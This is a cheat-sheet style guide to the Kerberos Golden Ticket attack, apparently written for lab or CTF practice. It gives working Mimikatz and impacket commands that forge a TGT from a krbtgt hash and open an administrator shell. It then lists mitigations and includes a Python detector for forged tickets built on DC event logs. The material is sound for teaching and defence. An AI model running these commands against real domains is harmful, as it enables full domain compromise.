# Golden Ticket Attack

### Overview

A **Golden Ticket attack** is a **Kerberos ticket forgery attack** that allows an attacker to generate **valid TGTs** for **any user in the domain**, including **Domain Admins**, without knowing their password.

This attack becomes possible once the attacker obtains the **KRBTGT account hash**, the key used to encrypt and sign Kerberos TGTs. Because every domain controller trusts tickets protected with this key, a forged TGT is accepted as legitimate.

### Prerequisites

1. The NT hash or AES key of the `krbtgt` account (obtained via DCSync, e.g. secretsdump, or from a copy of NTDS.dit).
2. The domain name (e.g., `sequel.htb`), the domain SID and the username to impersonate.

### Steps

1. Dump the `krbtgt` account secrets and keep the NT hash.
2. Obtain the Domain SID.

   ```bash
   # Resolve SIDs through the domain controller; the domain SID is any
   # account SID with its trailing RID (e.g. -500, -1105) removed.
   impacket-lookupsid toffee.bth/ca_svc@10.10.10.100
   ```
3. Create the golden ticket and authenticate as the administrator.

   ```bash
   # WINDOWS (Mimikatz): forge the TGT and inject it into the current logon
   # session (/ptt = pass-the-ticket), then open a shell that uses it.
   # /id:500 is the RID of the built-in Administrator account.
   kerberos::golden /User:Administrator /domain:candy.local /sid:S-1-5-21-2356823372-3609795904-2142328116 /krbtgt:ab20acb811769e025aba7d4fef487b96 /id:500 /ptt
   misc::cmd

   # LINUX: impacket-ticketer writes the forged TGT to <user>.ccache; point
   # KRB5CCNAME at it and authenticate with -k -no-pass.
   impacket-ticketer -nthash <KRBTGT_NT_HASH> -domain toffee.bth -domain-sid S-1-5-21-1111111111-2222222222-3333333333 Administrator
   export KRB5CCNAME=Administrator.ccache
   impacket-psexec toffee.bth/Administrator@dc.toffee.bth -k -no-pass
   ```

### Mitigations

1. Rotate the `krbtgt` password twice, allowing replication to complete between the two resets: the KDC still accepts tickets encrypted with the previous key, so a single reset leaves forged tickets valid.
2. Protect the `krbtgt` secret by restricting who holds DCSync (directory replication) rights and by limiting membership of Domain Admins and Backup Operators.
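As an added detection example (not part of the original checklist), the following correlates DC security events: a forged TGT never passes through the KDC, so a service-ticket request (4769) with no prior TGT issuance (4768) for that account, an RC4 ticket in an AES-only domain, or a username absent from the directory are all signs worth alerting on. The event lines, field names and account list are constructed for this example.

```python
"""Flag service-ticket requests (event 4769) that no DC issued a TGT (4768) for.
A forged TGT never passes through the KDC, so a golden ticket typically shows up
as a 4769 with no 4768 for that account, often RC4 (0x17) when built from the NT hash."""
import re
from datetime import datetime, timedelta

TGT_LIFETIME = timedelta(hours=10)  # default maximum TGT lifetime
RC4 = "0x17"                        # TicketEncryptionType value for RC4-HMAC
FIELD = re.compile(r"(\w+)=(\S+)")

# Constructed sample events (not real log exports), flattened to key=value pairs.
SAMPLE_EVENTS = [
    "2024-05-01T08:00:01 EventID=4768 Account=alice EncType=0x12 Client=10.10.10.50",
    "2024-05-01T08:00:05 EventID=4769 Account=alice Service=cifs/fs01 EncType=0x12 Client=10.10.10.50",
    "2024-05-01T09:12:00 EventID=4769 Account=Administrator Service=cifs/dc01 EncType=0x17 Client=10.10.10.99",
    "2024-05-01T09:12:02 EventID=4769 Account=nobody Service=ldap/dc01 EncType=0x17 Client=10.10.10.99",
]
KNOWN_ACCOUNTS = {"alice", "administrator", "ca_svc"}  # constructed directory listing

def parse(line):
    # '<iso timestamp> key=value ...' -> dict with a datetime under 'ts'
    ts, _, rest = line.partition(" ")
    event = dict(FIELD.findall(rest))
    event["ts"] = datetime.fromisoformat(ts)
    return event

def find_suspect_tgs(lines, known_accounts=KNOWN_ACCOUNTS, aes_only=True):
    """Return (account, client, reasons) for every 4769 that looks forged."""
    events = [parse(line) for line in lines]
    tgt_issued = {}  # lowercase account -> timestamps of its 4768 events
    for ev in events:
        if ev["EventID"] == "4768":
            tgt_issued.setdefault(ev["Account"].lower(), []).append(ev["ts"])
    findings = []
    for ev in events:
        if ev["EventID"] != "4769":
            continue
        acct = ev["Account"].lower()
        reasons = []
        # A genuine service ticket rests on a TGT some DC issued within its lifetime.
        if not any(ev["ts"] - TGT_LIFETIME <= t <= ev["ts"] for t in tgt_issued.get(acct, [])):
            reasons.append("no 4768 within TGT lifetime")
        if aes_only and ev.get("EncType") == RC4:
            reasons.append("RC4 ticket in AES-only domain")
        if acct not in known_accounts:
            reasons.append("account not in directory")
        if reasons:
            findings.append((ev["Account"], ev["Client"], reasons))
    return findings
```

Run this over the merged security logs of all domain controllers, not a single server's: a legitimate TGT is frequently issued by a different DC than the one that later serves the TGS request, and checking one DC alone produces false positives.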
